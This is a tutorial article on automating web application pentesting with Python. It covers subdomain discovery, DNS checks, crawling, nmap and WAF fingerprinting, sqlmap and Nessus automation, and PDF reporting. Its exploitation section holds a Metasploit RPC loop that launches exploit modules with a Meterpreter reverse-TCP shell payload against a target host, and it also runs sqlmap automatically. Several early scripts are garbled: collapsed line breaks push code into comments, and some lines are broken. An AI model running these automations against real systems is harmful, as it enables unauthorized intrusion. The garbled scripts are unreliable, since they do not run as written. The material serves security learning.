by Harshit Raj Singh
Python is an incredibly powerful and versatile programming language that is widely used in the field of cybersecurity. As a pentester, having a solid understanding of Python can greatly enhance your ability to identify and exploit vulnerabilities, automate tasks, and write custom tools and scripts. In this article, we will delve into some of the key ways in which Python can be used by pentesters for automating their web pentesting, as well as provide some useful resources for those looking to get started or deepen their knowledge of the language. To get the most out of this article, you need to have a basic understanding of Python.
Why Python?
Python is a high-level, interpreted programming language that is known for its simplicity, readability, and flexibility. It has a large and active community of developers, which has contributed to the creation of a vast ecosystem of libraries and tools that can be used for a wide range of purposes.
In the context of pentesting, Python is often used for a variety of tasks, including:
- Automating and streamlining tasks, such as scanning networks, identifying vulnerabilities, and running exploits
- Writing custom tools and scripts to perform specific tasks or solve specific problems
- Interacting with and manipulating web servers and applications
- Reverse engineering and analyzing binary files and protocols
- Working with and analyzing data
One of the key benefits of Python is that it is relatively easy to learn and use, even for those with little or no programming experience. Its simple syntax, vast libraries, and wealth of online resources make it an excellent choice for those looking to get started in the field of programming and cybersecurity.
Web Application Pentesting
Web application penetration testing is a process of identifying and reporting vulnerabilities and weaknesses in a web application that could be exploited by attackers. The purpose of pentesting is to detect and report any vulnerabilities that are present so that they can be fixed before they can be used by malicious actors.
The web application penetration testing process involves a systematic series of steps, including gathering information about the target system, identifying vulnerabilities or faults, researching for exploits that can exploit those faults or vulnerabilities, and ultimately compromising the web application.
Steps and Methodologies Used to Perform a Web App Pen Test:
Conducting a penetration test on a web application requires a specific set of steps and methodologies to ensure a thorough examination of the app's security.
Information Gathering (Reconnaissance)
The goal of the information gathering, or reconnaissance, phase is to gather as much information about the target system as possible. This information can then be used to identify vulnerabilities and plan the next steps in the penetration testing process. Without a solid foundation of information, the rest of the penetration testing process will be less effective.
There are two types of reconnaissance, depending on the level of interaction with the target system:
Passive reconnaissance
Passive reconnaissance is a method of gathering information that is already available on the internet without directly interacting with the target system. This type of reconnaissance is less intrusive and less likely to be detected by the target system.
Examples of passive reconnaissance techniques include Google Dorking, using crt.sh to query certificate transparency logs, and using the Wayback Machine, which lets you browse archived versions of websites.
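As a quick illustration of that last technique, the Wayback Machine's CDX API can be queried with a few lines of Python using the requests library. This is a minimal sketch, separate from the scripts that follow, and domain.com is a placeholder target.
import requests

# Query the Wayback Machine CDX API for archived URLs of the target domain
params = {
    "url": "domain.com/*",   # placeholder target
    "output": "json",
    "fl": "original",
    "collapse": "urlkey",
    "limit": 50,
}
resp = requests.get("http://web.archive.org/cdx/search/cdx", params=params)
rows = resp.json()
# The first row is the header ("original"); the remaining rows are archived URLs
archived_urls = {row[0] for row in rows[1:]}
print(archived_urls)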
Active reconnaissance
Active reconnaissance is the process of directly probing a target system to gather information about it. This is in contrast to passive reconnaissance, which involves gathering information without directly interacting with the target.
Examples of active reconnaissance techniques include fingerprinting a web application, using the Shodan network scanner, performing DNS forward and reverse lookups, and conducting a DNS zone transfer.
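As a small illustration of the last technique, a DNS zone transfer attempt can be scripted with dnspython (the same library used for brute-forcing later in this article). This is only a sketch: domain.com is a placeholder, and most properly configured name servers will simply refuse the transfer.
import dns.resolver
import dns.query
import dns.zone

domain = "domain.com"  # placeholder target

# Find the authoritative name servers for the domain
for ns in dns.resolver.resolve(domain, "NS"):
    ns_name = ns.to_text()
    try:
        # Zone transfers need the name server's IP address
        ns_ip = dns.resolver.resolve(ns_name, "A")[0].to_text()
        # Attempt an AXFR (zone transfer) against the name server
        zone = dns.zone.from_xfr(dns.query.xfr(ns_ip, domain))
        for name in zone.nodes.keys():
            print(f"{name}.{domain}")
    except Exception as exc:
        print(f"Zone transfer failed for {ns_name}: {exc}")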


Automating the Reconnaissance Phase
Now we are going to use our programming knowledge to automate both active and passive reconnaissance using Python.
Required Libraries:
- dnspython
- requests
- beautifulsoup4
- googlesearch
"""Finding Subdomain using Passive
Recon""" from googlesearch import search
import re
import
requests
import sys
def get_subdomains_using_google_search(domain:str)->set: """
Search for subdomains of a domain using Google search
:param domain: The domain to search for subdomains
:return: A set of subdomains """
# Define your search query query = f"site:*.{domain}"
# Regex to match URLs that contain the string "domain.com" regex = re.compile(r"^(http|https)?[-_\w]+\.{}".format(domain))
subdomains = list()
# Search for the string "site:*.domain.com" in Google and return the list of URLs for url in search(query):
match_url = regex.match(url) if match_url:
subdomains.append(match_url.group()) return set(subdomains)
def get_subdomain_using_crtsh(domain:str)->set: """
Search for subdomains of a domain using crt.sh """
# Define the URL to search for subdomains
url = f"https://crt.sh/?q={domain}&output=json"
# Make a request to the URL response = requests.get(url)
# Regex to match URLs that contain the string "domain.com" regex = re.compile(r"^(http|https)?[-_\w]+\.{}".format(domain))
subdomains = list() wildcard_subdomains = list()
# Search for the string "site:*.domain.com" in Google and return the list of URLs for data in response.json():
if "*" in data['common_name']: wildcard_subdomains.append(data['common_name']) continue
else:
match_url = regex.match(data['name_value']) if match_url:
subdomains.append(match_url.group()) return set(subdomains)
def main():
if len(sys.argv) < 2:
print("Usage: python3 passive_subdomain_finder.py <domain>") sys.exit(1)
else:
domain = sys.argv[1]
print(f"Searching for subdomains of {domain}") google_subdomains = get_subdomains_using_google_search(domain) crtsh_subdomains = get_subdomain_using_crtsh(domain) print("Google Search Subdomains: ", google_subdomains) print("crt.sh Subdomains: ", crtsh_subdomains)
if name == " main ": main()
>>> python3 passive_subdomain_finder.py domain.com Searching for subdomains of domain.com
Google Search Subdomains: {'https://www.domain.com', 'http://blog.domain.com'}
crt.sh Subdomains: {'domainadmin.domain.com', 'app.domain.com', 're-api-staging.domain.co m', 'webmail14.domain.com', 'webmail12.domain.com', 'webmail5.domain.com', 'webmail2.domai n.com', 'cp.domain.com', 'editor.domain.com', 'seo.domain.com', 'app-gateway-staging.domai n.com', 'vip.domain.com', 'webmail6.domain.com', 're-api.domain.com', 'webmail15.domain.co m', 'webmail7.domain.com', 'webmail17.domain.com', 'identity.domain.com', 'webmail13.domai n.com', 'webmail8.domain.com', 'sitebuilder.domain.com', 'telhosting.domain.com', 'smart-b log.domain.com', 'webmail10.domain.com', 'webmail4.domain.com', 'private---domain.com', 'm yhomelabitcom.domain.com', 'secure.domain.com', 'webmail16.domain.com', 'cluster.domain.co m', 'controlpanel.domain.com', 'smart-blog-staging.domain.com', 'blog-api-staging.domain.c om', 'app-gateway.domain.com', 'registration.domain.com', 'app-staging.domain.com', 'webma il3.domain.com', 'verify.domain.com', 'sldacluster.domain.com', 'webmail9.domain.com', 'pr ivate--domain.com', 'buildit.domain.com', 'webmail11.domain.com', 'preview-editor.domain.c om', 'transfers.domain.com', 'webmail.domain.com', 'public---domain.com', 'buildit-stagin g.domain.com', 'blog-api.domain.com'}
"""Finding Subdomains and DNS Records using Active Recon""" import dns.resolver
import threading import sys
from queue import SimpleQueue
def _subdomain_bruteforce_worker(domain:str, verified_subdomains:list, queue:SimpleQueue): """
Bruteforce subdomains """
# Keep looping until the queue is empty while not queue.empty():
# Get the next word from the queue word = queue.get()
url = f"{word}.{domain}"
# Check if the subdomain exists if dns_query(url, 'A'):
verified_subdomains.append(url)
def subdomain_bruteforce(domain:str, wordlist:str): """
Search for subdomains of a domain using bruteforce
:param domain: The domain to search for subdomains
:param wordlist: The wordlist to use
:return: A set of subdomains """
queue = SimpleQueue()
# Add all words from the wordlist to the queue for word in wordlists(wordlist):
queue.put(word)
verified_subdomains = list() threads = list()
# Create 10 threads for _ in range(0, 10):
t = threading.Thread(target=_subdomain_bruteforce_worker, args=(domain, verified_subdo mains, queue))
threads.append(t) t.start()
# Wait for all threads to complete for thread in threads:
thread.join()
print("Subdomains: ", set(verified_subdomains)) def wordlists(filename:str):
"""
Read a wordlist """
for line in open(filename, 'r', encoding='utf-8', errors='ignore'): yield line.strip()
def dns_query(domain:str, record:str): """
Query DNS records """
try:
answers = dns.resolver.resolve(domain, record) return answers
except dns.resolver.NoAnswer: pass
except dns.resolver.NXDOMAIN: pass
except dns.resolver.NoNameservers: pass
except dns.resolver.Timeout: pass
except Exception as e: print(e)
pass return None
def check_dns_records(domain:str): """
Check DNS records for a domain """
for record in ['A', 'AAAA', 'CNAME', 'MX', 'NS', 'SOA', 'TXT']:
answers = dns_query(domain, record) if answers:
for rdata in answers: print(f"{record}: {rdata}")
def main(): """
Main function """
if len(sys.argv) < 3:
print("Usage: python3 domain_discovery.py <domain> <wordlist>") sys.exit(1)
else:
domain = sys.argv[1] wordlist_filename = sys.argv[2]
print(f"Checking DNS records for {domain}") check_dns_records(domain)
print("*"*50)
print(f"Searching for subdomains of {domain} using Bruteforce") subdomain_bruteforce(domain, wordlist_filename)
if name == " main ": main()
>>> python3 domain_discovery.py domain.com wordlist.txt Checking DNS records for domain.com
A: 13.228.112.135
MX: 10 mx.domain.com. NS: ns-166.awsdns-20.com.
NS: ns-2022.awsdns-60.co.uk. NS: ns-683.awsdns-21.net.
NS: ns-1250.awsdns-28.org.
SOA: ns-2022.awsdns-60.co.uk. awsdns-hostmaster.amazon.com. 2017090501 7200 900 1209600 86
400
TXT: "google-site-verification=zlpN6bg9OaBJVw4Lv4-1fZ2wHekVqEnEGBXwuonNpBM"
TXT: "v=spf1 ip4:38.113.1.0/24 ip4:38.113.20.0/24 ip4:12.45.243.128/26 ip4:65.254.224.0/19
include:_spf.google.com include:_spf.qualtrics.com -all"
TXT: "google-site-verification=1aIdxE8tG_8BUCMClWep8Z33AIxgsL91plweqqCuNZU" TXT: "google-site-verification=M2Ehy1mb_Yh-Z57igzRDXPY35c5nNsYmI_l3B6D9zZs"
************************************************** Searching for subdomains of domain.com using Bruteforce
Subdomains: {'pop.domain.com', 'online.domain.com', 'cp.domain.com', 'billing.domain.co m', 'www1.domain.com', 'client.domain.com', 'origin.domain.com', '4.domain.com', 'join.dom ain.com', 'mail5.domain.com', 'ns3.domain.com', 'mail4.domain.com', 'sftp.domain.com', 'ma il3.domain.com', 'cn.domain.com', 'www.domain.com', 'dashboard.domain.com', 'images.domai
n.com', 'services.domain.com', 'panel.domain.com', 'test.domain.com', '3.domain.com', '8.d omain.com', 'api.domain.com', 'api-test.domain.com', 'wordpress.domain.com', 'mail6.domai n.com', 'register.domain.com', 'sip.domain.com', 'vip.domain.com', 'members.domain.com',
'imap.domain.com'}
We can also use Sublist3r, a subdomain enumeration tool written in Python that supports both active and passive subdomain enumeration.
import sublist3r
subdomains = sublist3r.main("domain.com", 30, "domain_subs.txt", ports=None, silent=False, verbose=False, enable_bruteforce=True, engines=None)
Other Python alternatives for subdomain brute-forcing:
- subbrute
- aiodnsbrute
- altdns
Using the Nmap port scanner from our Python program for network scanning (via the nmap3 library):
import nmap3
nmap = nmap3.Nmap()
top_ports = nmap.scan_top_ports("domain.com")
os_results = nmap.nmap_os_detection("domain.com")
version_result = nmap.nmap_version_detection("domain.com")
#Results will be in JSON format
- Using Wappalyzer and Webtech for identifying technologies used on websites:
from Wappalyzer import Wappalyzer, WebPage
webpage = WebPage.new_from_url('https://domain.com')
wappalyzer = Wappalyzer.latest(update=True)
result = wappalyzer.analyze_with_versions_and_categories(webpage)
'''
{'Optimizely': {'versions': [], 'categories': ['Analytics']}, 'Nginx': {'versions': [], 'categories': ['Web servers', 'Reverse proxies']}, 'Amazon Cloudfront': {'versions': [], 'categories': ['CDN']}, 'Google Tag Manager': {'versions': [], 'categories': ['Tag managers']}, 'Amazon Web Services': {'versions': [], 'categories': ['PaaS']}}
'''
import webtech
wt = webtech.WebTech(options={"json": True})
result = wt.start_from_url("https://domain.com")
'''
{'tech': [{'name': 'Nginx', 'version': None}, {'name': 'Amazon Cloudfront', 'version': None}, {'name': 'Google Tag Manager', 'version': None}], 'headers': [{'name': 'x-amz-id-2', 'value': 'ZzHuolcP1O19qKTZTZPTL8UWkIS0pxAmnzti456IqFIz+VGraj6zoavVFaGKc4sBndUCQUqXrEs='}, {'name': 'x-amz-request-id', 'value': 'SJZMMGPJ11FW1QJW'}, {'name': 'x-amz-meta-cf-origin', 'value': 'coldstone-bucket'}, {'name': 'x-amz-version-id', 'value': 'psVWYmHEhj._PacQ29tCEqpL7BdgiQ4T'}, {'name': 'X-Amz-Cf-Pop', 'value': 'SIN2-P2'}]}
'''
"""This is a simple script for crawling the website.""" import sys
import asyncio import aiohttp import lxml.html from furl import furl
async def get_links(url:str, max_links:int=None)->list[str]: """
Args:
url (str): url of the page
max_links (int): maximum number of links to return
Returns:
List[str]: returns a list of links
"""
links = []
if url not in visited: visited.add(url) try:
# Make a request to the website
async with aiohttp.ClientSession() as session: async with session.get(url) as resp:
if resp.status != 200: return links
html = await resp.text() resp_url = furl(resp.url)
# Parse the HTML content
doc = lxml.html.fromstring(html) links_object = doc.cssselect('a') for link in links_object:
crawl_link = link.attrib.get('href')
if not any(x in crawl_link for x in list_of_invalid_links):
if resp_url.host in crawl_link or crawl_link.startswith('/'):
domain
else:
# Check if the link is relative without '/' and not other
if not crawl_link.startswith('http'): resp_url.path = crawl_link links.append(resp_url.url)
if max_links and len(links) >= max_links: break
except Exception as e: print(e)
pass
return links
async def crawl(url:str, depth:int=1)->None: """
Args:
url (str): url of the page
depth (int, optional): depth of the crawl. Defaults to 1.
"""
print("Crawling: ", url)
# Get all the links from the page links = await get_links(url) crawl_urls.extend(links)
if depth > 0:
# Create a list of coroutines to crawl the links
coroutines = [crawl(link, depth=depth-1) for link in links if link not in visited] await asyncio.gather(*coroutines)
async def main(): url = sys.argv[1] depth = 1
if len(sys.argv) > 2:
depth = int(sys.argv[2]) await crawl(url, depth)
if name == " main ": if len(sys.argv) < 2:
print("Usage: python3 crawler.py <url> <depth>") sys.exit(1)
visited = set() crawl_urls = []
# invalid links to ignore
list_of_invalid_links = ['mailto', 'javascript', 'tel', 'sms']
# Start the crawler
asyncio.run(main())
print(f"Crawled links: {set(crawl_urls)}")
>>> python3 crawler.py http://testphp.vulnweb.com 2 Crawling: http://testphp.vulnweb.com
Crawling: http://testphp.vulnweb.com/index.php Crawling: http://testphp.vulnweb.com/categories.php
--snip--
Crawled links: {'http://testphp.vulnweb.com/artists.php', 'http://testphp.vulnweb.com/Deta ils/web-camera-a4tech/2/', 'http://testphp.vulnweb.com/index.php', 'http://testphp.vulnwe b.com/%3Fpp=12', 'http://testphp.vulnweb.com/disclaimer.php', 'http://testphp.vulnweb.com/ privacy.php', 'http://testphp.vulnweb.com/%23', 'http://testphp.vulnweb.com/categories.ph p', 'http://testphp.vulnweb.com/hpp/', 'http://testphp.vulnweb.com/signup.php', 'http://te stphp.vulnweb.com/login.php', 'http://testphp.vulnweb.com/listproducts.php%3Fcat=4', 'htt p://testphp.vulnweb.com/Mod_Rewrite_Shop/', 'http://testphp.vulnweb.com/userinfo.php', 'ht tp://testphp.vulnweb.com/cart.php', 'http://testphp.vulnweb.com/AJAX/index.php', 'http://t estphp.vulnweb.com/artists.php%3Fartist=3', 'http://testphp.vulnweb.com/artists.php%3Farti st=1', 'http://testphp.vulnweb.com/Details/network-attached-storage-dlink/1/', 'http://tes tphp.vulnweb.com/listproducts.php%3Fcat=2', 'http://testphp.vulnweb.com/artists.php%3Farti st=2', 'http://testphp.vulnweb.com/guestbook.php', 'http://testphp.vulnweb.com/Details/col or-printer/3/', 'http://testphp.vulnweb.com/listproducts.php%3Fcat=3', 'http://testphp.vul nweb.com/listproducts.php%3Fcat=1'}
- Scrapy is a popular Python alternative for fast, high-level web crawling/spidering and scraping; a minimal link-collecting spider is sketched below.
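The following is a small, illustrative Scrapy spider (not one of the article's scripts); it reuses the testphp.vulnweb.com target from the crawler example and simply records and follows every link it finds.
import scrapy

class LinkSpider(scrapy.Spider):
    """Minimal Scrapy spider that follows and records links on a site."""
    name = "links"
    start_urls = ["http://testphp.vulnweb.com"]

    def parse(self, response):
        for href in response.css("a::attr(href)").getall():
            # Record the absolute URL of the link
            yield {"link": response.urljoin(href)}
            # Follow the link and parse it with this same callback
            yield response.follow(href, callback=self.parse)
Saved as link_spider.py, it can be run with: scrapy runspider link_spider.py -s DEPTH_LIMIT=2 -o links.json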
Scanning and Exploitation
The second phase of web application penetration testing is scanning and exploitation. This phase builds on the information gathered during reconnaissance: automated tools and manual techniques are used to identify vulnerabilities in the target web application, which are then exploited to gain unauthorized access.
During the scanning phase, penetration testers use tools such as Nessus, OpenVAS, and Burp Suite to scan the web application for known vulnerabilities. These tools generate a report that highlights the potential attack vectors, including information about open ports, software versions, and misconfigurations.

Once vulnerabilities have been identified, the exploitation phase begins. During this phase, penetration testers use tools such as Metasploit and SQLMap to take advantage of the identified vulnerabilities and gain access to the web application. This can include exploiting SQL injection, cross-site scripting, and file inclusion vulnerabilities.
It is important to note that while scanning and exploitation are closely related, they are distinct steps in the web application penetration testing process. The scanning phase is focused on identifying vulnerabilities, while the exploitation phase is focused on confirming and exploiting those vulnerabilities.
Automating the Scanning and Exploitation Phase:
Required Libraries:
- requests
- beautifulsoup4
- selenium
- Wappalyzer
- pymetasploit3
import requests
from bs4 import BeautifulSoup
from selenium import webdriver
from Wappalyzer import Wappalyzer, WebPage
from pymetasploit3.msfrpc import *

# Use requests to send a GET request to the web page
response = requests.get("http://example.com")
# Use beautifulsoup4 to parse the HTML of the web page
soup = BeautifulSoup(response.text, 'html.parser')
# Extract information from the web page
version = soup.find("meta", {"name": "generator"})["content"]
# Use Selenium to automate interaction with the web page
driver = webdriver.Firefox()
driver.get("http://example.com")
# Use Wappalyzer to identify the technologies used on the web page
wappalyzer = Wappalyzer.latest()
webpage = WebPage.new_from_driver(driver)
technologies = wappalyzer.analyze(webpage)
# Close the browser
driver.quit()
# Mapping of technologies to known vulnerabilities (Metasploit module paths)
known_vulnerabilities = {}
# Connect to the Metasploit RPC server for exploitation
msf = MsfRpcClient('password')
# Check for known vulnerabilities in the identified technologies
for technology in technologies:
    if technology in known_vulnerabilities:
        print("Vulnerability found: " + technology)
        # Attempt to exploit any known vulnerabilities
        for vulnerability in known_vulnerabilities[technology]:
            exploit = msf.modules.use('exploit', vulnerability)
            exploit['RHOSTS'] = 'example.com'
            exploit.execute(payload='windows/meterpreter/reverse_tcp')
- Using wafw00f for identifying and fingerprinting Web Application Firewall (WAF) products protecting a website.
from wafw00f.main import WAFW00F as waf
firewall_scanner = waf(target='https://example.com', followredirect=True, extraheaders={}, proxies=None)
# identifying name of the firewall
identified_WAF = firewall_scanner.identwaf()
print("Firewall: ", identified_WAF)
# checking if firewall scanner has generic detection
if firewall_scanner.genericdetect() and not identified_WAF:
    reason = firewall_scanner.knowledge['generic']['reason']
    print("Reason: ", reason)
"""
Firewall: ['Edgecast (Verizon Digital Media)'] """
- Using sqlmap inside a Python program via the subprocess module to detect and exploit SQL injection vulnerabilities.
import subprocess
from shlex import split
def sqlmap_scan(url):
    try:
        result = subprocess.run(split(f"sqlmap -u {url} --batch"), capture_output=True, text=True, check=True)
        return result.stdout
    except subprocess.CalledProcessError as e:
        return e.output

# Example usage
url = "http://example.com/page?id=1"
output = sqlmap_scan(url)
print(output)
- Using the pynessus library for automating Nessus vulnerability scans from Python.
from pynessus import Nessus
from pynessus.models.user import User
# Connect to Nessus
nessus = Nessus("localhost", 8834)
if nessus.login(User("admin", "password")):
    nessus.load_scans()
    # display scans
    for scan in nessus.scans:
        print("%s - %s" % (scan.uuid, scan.name))
    # creating a new scan
    scan = nessus.Scan()
    scan.name = "example.com"
    # Launch scan
    if scan.launch():
        print(f"Scan {scan.uuid} successfully launched")
    else:
        print(f"Error occurred while launching scan {scan.name}")
else:
    print("Fail!")
- Other Python alternatives for vulnerability scanning (a short OWASP ZAP example follows this list):
- python-owasp-zap
- w3af
- vulners
- openvas-lib
- Bolt
- XSStrike
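To illustrate one of these alternatives, here is a minimal sketch that drives OWASP ZAP through its Python API (the zapv2 package). It assumes a ZAP instance is already running on 127.0.0.1:8080; the API key and target are placeholders.
from zapv2 import ZAPv2
import time

# Connect to a locally running ZAP instance (API key is a placeholder)
zap = ZAPv2(apikey='changeme', proxies={'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'})
target = "http://testphp.vulnweb.com"

# Spider the target to discover URLs
scan_id = zap.spider.scan(target)
while int(zap.spider.status(scan_id)) < 100:
    time.sleep(2)

# Run an active scan against everything the spider found
scan_id = zap.ascan.scan(target)
while int(zap.ascan.status(scan_id)) < 100:
    time.sleep(5)

# Print the alerts (findings) reported for the target
for alert in zap.core.alerts(baseurl=target):
    print(alert['risk'], '-', alert['alert'], '-', alert['url'])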
Reporting and Recommendations: Putting it All Together
The reporting and recommendations phase of web application pentesting is crucial in ensuring the security of a website or web application. The goal of this phase is to document the vulnerabilities that were identified during the assessment and provide recommendations on how to mitigate them.
When creating a web application penetration testing report, it's important to include the following key elements:
- Summary: A brief overview of the testing scope, methodology, and the key findings.
- Testing Methodology: A detailed description of the testing methodology, including the tools and techniques used, the scope of the assessment, and the schedule of the assessment.
- Vulnerability Findings: A comprehensive list of the vulnerabilities that were identified, including the severity of each vulnerability, the impact of the vulnerability, and the recommended solution for mitigating it.
- Proof of Concept (POC): Screenshots, log files, and other evidence that support the findings and recommendations.
- References: Additional resources and links that may be useful.
Automating the Reporting And Recommendations Phase:
You can automate this process by first creating a report template that includes the summary, recommendation (mitigation), and references for each vulnerability your tools or plugins cover. For the methodology, your script can record the steps it performs and capture a screenshot with pyppeteer, or create images with the Pillow library, as a POC. After that, you can use the reportlab module to generate professional-looking reports in PDF format, as sketched below.
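As a rough illustration of that last step (not part of the original tooling), the following sketch assembles a single-finding PDF with reportlab. The finding text is hypothetical, and the ssl_info.jpg POC image is assumed to have been produced by a script such as the SSL checker shown next.
from reportlab.lib.pagesizes import A4
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer, Image

# Hypothetical finding data, e.g. produced by the SSL checker below
finding = {
    "title": "SSL/TLS Certificate Expiry",
    "summary": "The host uses an SSL/TLS certificate which will expire in 393 days.",
    "recommendation": "Renew the certificate before its expiration date and automate renewal.",
    "reference": "https://owasp.org/www-project-web-security-testing-guide/",
}

styles = getSampleStyleSheet()
doc = SimpleDocTemplate("report.pdf", pagesize=A4)

# Build the report: title, then one section per template field
story = [Paragraph(finding["title"], styles["Heading1"])]
for section in ("summary", "recommendation", "reference"):
    story.append(Paragraph(section.capitalize(), styles["Heading2"]))
    story.append(Paragraph(finding[section], styles["BodyText"]))
    story.append(Spacer(1, 12))

# Embed the POC image generated by the SSL checker
story.append(Paragraph("Proof of Concept", styles["Heading2"]))
story.append(Image("ssl_info.jpg", width=400, height=150))

doc.build(story)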
Below is a small script that checks a website's SSL certificate, prints the certificate information, and creates an image of that information, marking the number of days remaining until expiration with a red rectangle.
import ssl
import socket
import datetime
import json
import sys
from furl import furl
from PIL import Image, ImageDraw, ImageFont

def create_poc(text_dict:dict, marked_text:str=None):
    """
    Creates a proof of concept image with the given text and marks the given text with a red rectangle
    """
    # Create a new image with a black background
    img = Image.new('RGB', (800, 300), color=(0, 0, 0))
    # Create a draw object to draw on the image
    draw = ImageDraw.Draw(img)
    # Define font and font size
    font = ImageFont.truetype("arial.ttf", 16)
    # Write the text to the image
    x, y = 10, 10
    draw.text((x, y), f'Url: {url}', font=font, align='center', fill=(255, 255, 255))
    for key, value in text_dict.items():
        y += 30
        # Draw a red rectangle around the marked text
        if marked_text and marked_text == value:
            text_width, text_height = draw.textsize(f"{key}: {value}", font=font)
            draw.rectangle([x, y, x+text_width, y+text_height], fill=(255, 0, 0))
        draw.text((x, y), f"{key}: {value}", font=font, fill=(255, 255, 255))
    # Save the image
    img.save("ssl_info.jpg")

def get_certificate_info(url:str) -> dict:
    """
    Get the expiration date and other info of a website's SSL certificate.
    """
    # Check if scheme is https or http
    scheme = furl(url).scheme
    if scheme == "http":
        print("Host is not using HTTPS.")
        return
    elif scheme == "https":
        pass
    else:
        url = f"https://{url}"
    hostname = furl(url).host
    # Create an SSL context
    context = ssl.create_default_context()
    sock = socket.create_connection((hostname, 443))
    ssl_sock = context.wrap_socket(sock, server_hostname=hostname)
    cert = ssl_sock.getpeercert()
    try:
        sock.close()
        ssl_sock.close()
    except:
        pass
    # Extract the dates and identities from the certificate
    issue_date = cert["notBefore"]
    expiration_date = cert["notAfter"]
    issuer = cert["issuer"]
    subject = cert["subject"]
    # Convert the expiration date from string to datetime object
    expiration_date_dt = datetime.datetime.strptime(expiration_date, "%b %d %H:%M:%S %Y %Z")
    # Get the current date
    current_date = datetime.datetime.now()
    # Calculate the number of days until the certificate expires
    days_until_expiration = expiration_date_dt - current_date
    # Return the results
    result = {
        "Not Valid After": days_until_expiration.days,
        "Expiration Date": expiration_date,
        "Issue Date": issue_date,
        "Issuer": f"{issuer[0][0][1]} {issuer[1][0][1]} {issuer[2][0][1]}",
        "Subject": subject[0][0][1]
    }
    return result

poc_desc1 = 'The SSL/TLS certificate provided by the host cannot be trusted because it has expired.'
poc_desc2 = 'The host uses an SSL/TLS certificate which will expire in {} days.'

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 ssl_checker.py <url>")
        sys.exit(1)
    else:
        url = sys.argv[1]
        result = get_certificate_info(url)
        if result["Not Valid After"] < 0:
            print(poc_desc1)
        else:
            print(poc_desc2.format(result["Not Valid After"]))
        print(f"For more information, see the following JSON output:\n{json.dumps(result, indent=4)}")
        create_poc(result, marked_text=result["Not Valid After"])
"""
The host uses an SSL/TLS certificate which will expire in 393 days.
For more information, see the following JSON output:
{
"Not Valid After": 393,
"Expiration Date": "Feb 13 23:59:59 2024 GMT",
"Issue Date": "Jan 13 00:00:00 2023 GMT",
"Issuer": "US DigiCert Inc DigiCert TLS RSA SHA256 2020 CA1", "Subject": "US"
}
"""

Wrapping Up
In conclusion, web application pentesting is an essential step in ensuring the security of a website or web application. By identifying and addressing vulnerabilities, organizations can protect their assets and sensitive data from cyber-attacks.
Python is a powerful tool for automating the process of web application pentesting. With its vast array of libraries and modules, it allows for efficient and effective testing of web applications.
In this article, we have discussed the methodology of web application pentesting and how it can be automated using Python. From reconnaissance to identifying vulnerabilities and exploiting them, we have seen how Python can be used to streamline the process and make it more efficient.
However, it's important to note that automation should never replace manual testing, and it's always a good idea to have a combination of both manual and automated testing to ensure that all vulnerabilities are identified and addressed.
By understanding the importance and the process of web application pentesting, and by utilizing Python to automate the process, Security Researchers can better protect organizations against potential cyber threats.